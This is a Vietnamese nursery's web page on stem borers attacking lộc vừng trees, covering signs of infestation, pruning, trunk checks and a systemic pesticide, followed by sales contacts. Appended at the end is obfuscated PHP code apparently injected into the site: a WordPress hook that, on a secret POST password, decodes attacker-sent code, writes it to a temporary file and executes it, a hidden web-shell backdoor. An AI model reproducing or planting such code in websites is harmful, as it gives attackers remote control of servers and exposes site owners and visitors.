Trị sâu đục thân cây lộc vừng hiệu quả ít người biết

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Sâu đục thân hại cây lộc vừng không còn xa lạ với nhiều người. Chúng thường được trồng trước nhà như vừa để lấy bóng mát và vừa để làm cây cảnh. Chăm sóc cây lộc vừng trước sự phá hoại của sâu bọ có dễ không? Hãy cùng Vườn cây Hòa Bình tìm hiểu về cách trị sâu đục thân cây lộc vừng, dấu hiệu và cách phòng tránh nhé!

Sâu đục thân có khả năng phá hoại như thế nào?

Sâu đục thân hay còn có tên gọi khác là sâu đục cành, sâu hại thân. Chúng là nguyên nhân chủ yếu gây phá hoại mùa màng, cây cối từ trước đến nay. Gây thiệt hại rất lớn cho ngành nông nghiệp. Không chỉ làm thiệt hại về nông sản, sự phát triển của sâu đục thân còn khiến người dân bắt đầu lo lắng. 

Sâu đục thân phá hoại trực tiếp vào thân gỗ, khoét lỗ thân gỗ thành lỗ rỗng to. Không chỉ phá hoạt thân gỗ chúng còn phá hoại các bộ phận khác như lá, rễ, cành, quả,… Sau đó cây sẽ mất khả năng vận chuyển nước lên các bộ phận bên trên. Từ đó cây sẽ chết dần chết mòn. 

Đối tượng trực tiếp của loài sâu này là từ 2-10 tuổi. Tuy nhiên tùy nhiều loài cây khác nhau, có khi chỉ vừa mới trồng cây được 2-3 tháng thì đã bị sâu đục thân phá hoại rồi. Nên bà con hết sức cảnh giá với loài sâu bệnh cây trồng này. 

Sâu đục cành, sâu hại thân
Sâu đục cành, sâu hại thân

>>> Xem thêm: 3 LOẠI CÂY ĂN QUẢ CHO BÓNG MÁT ĐƯỢC TRỒNG NHIỀU NHẤT

Dấu hiệu cây lộc vừng bị sâu đục thân tấn công

Làm sao để phát hiện ra cây trồng đang bị sâu đục thân gây hại là kỹ năng hết sức quan trọng. Giúp bạn cứu cây trồng kịp thời, loại bỏ sâu bệnh, giúp cây sinh trưởng tốt trở lại. 

Có những loại sâu đục thân nào thường xuất hiện trên cây lộc vừng? 

Với những người trồng cây lộc vừng lâu năm thì các loài sâu như sâu đục thân, sây ăn lá, sâu xám,… đều là những kẻ phá hoại quen thuộc. Chúng sinh tồn bằng cách phá hoại trực tiếp vào thân cây để lấy nguồn dinh dưỡng. Từ đó làm cho quá trình vận chuyển chất dinh dưỡng trong cây gặp vấn đề khiến cây thiếu chất. Nếu không được ngăn chặn hoạt phát hiện kịp thời thì cây sẽ chết. 

Khi bạn quan sát cây thì sẽ thấy các mùn gỗ nhỏ dạng hình lỗ xuất hiện từng vùng trên cây. Tập trung chủ yếu nhất là thân cây và cành cây. Không quá khó để kết luận đây là dấu hiệu của việc cây lộc vừng đã bị sâu đục thân tấn công. 

Dấu hiệu cây lộc vừng bị sâu đục thân tấn công
Dấu hiệu cây lộc vừng bị sâu đục thân tấn công

>>> Xem thêm: Bán Cây Công Trình – Mua, bán cây trồng tại Hà Nội

Cách trị sâu đục thân cây lộc vừng như thế nào?

Biết được biện pháp phòng tránh như một chiếc chìa khóa giúp bạn giải cứu cây lộc vừng của nhà mình. Bạn hãy thường xuyên để ý thực hiện những biện pháp sau đây: 

Cắt tỉa cây thường xuyên

Cắt tỉa cây lộc vừng sẽ giúp bạn biết được tình trạng cây của mình như thế nào? Nếu cây trồng phát triển tốt thì lá cây sẽ xanh tươi, hoa rực rỡ, thân cây rắn chắc, bề mặt thân không có sinh vật kí sinh. Do cây hấp thụ chất dinh dưỡng và muối khoáng tốt nên cây sinh trưởng và phát triển rất ổn định. Cắt tỉa cây không chỉ giúp cây trông gọn gàng, mà còn giúp các bộ phận trên cây phát triển đồng đều hơn. 

Cắt tỉa cây lộc vừng
Cắt tỉa cây lộc vừng

Thân cây của bạn có thực sự lành lặn?

sâu đục thân tấn công vào phần lõi của cây nên rất khó để phát hiện xem cây có bị bệnh hay không? Do đó quan sát thân cây là biện pháp khả thi được nhiều người áp dụng. Nếu trên thân cây xuất hiện các nốt nhỏ chứa mùn gỗ thì chứng tỏ thân cây đã bị sâu hại. Bạn cần kiểm tra cây cố định 2-3 tuần/1 lần để kịp thời phát hiện. 

Sử dụng thuốc đặc trị sâu đục thân

Hiện nay sử dụng thuốc trừ sâu vẫn là một cách được nhiều người áp dụng nhất. Không chỉ vì hiệu quả tốt mang lại mà biện pháp này khá dễ thực hiện, không mất nhiều công sức. 

Thuốc lưu dẫn Basudin là một trong các loại thuốc được sử dụng phổ biến. Bạn chỉ cần rải thuốc quanh gốc cây, sau đó tưới nước để thuốc ngấm vào cây. Sâu đục thân sẽ nhanh chết do hiệu quả của thuốc cực kỳ cao. 

Nhược điểm của phương pháp này là thuốc sẽ rất độc hại nên bạn cần bảo hộ an toàn trước khi thực hiện nhé!

Sử dụng thuốc đặc trị sâu đục thân
Sử dụng thuốc đặc trị sâu đục thân

>>> Xem thêm: Dịch Vụ Cây Xanh – Mua, bán cây trồng giá rẻ tại Hà Nội

Mua cây lộc vừng ở đâu?

Trên đây là chi tiết các cách trị sâu đục thân cây lộc vừng, dấu hiệu và cách phòng tránh do Vườn cây Hòa Bình cung cấp. Rất mong bạn đã biết thêm các thông tin hữu ích để áp dụng giúp cây lộc vừng của nhà mình phát triển tốt nhất. 

Vườn cây Hòa Bình là một trong những đơn vị đi đầu trong việc cung cấp cây xanh và các dự án trồng cây xanh trên toàn quốc. Chúng tôi luôn cam kết chất lượng sản phẩm và dịch vụ tốt nhất tới khách hàng. Luôn đồng hành cùng khách hàng trong quá trình mua và sử dụng sản phẩm. 

Chúng tôi có mạng lưới phân phối rộng khắp cả nước. Chúng tôi cung cấp các sản phẩm như cây phong thủy, cây xanh công trình, cây xanh đô thị ngoại thất, nội thất

>>>Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình

Hãy liên hệ với chúng tôi thông qua: 

Hotline: 0962.376.560

Bán hàng: 0962.376.560

Nguyễn Trường Giang

Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}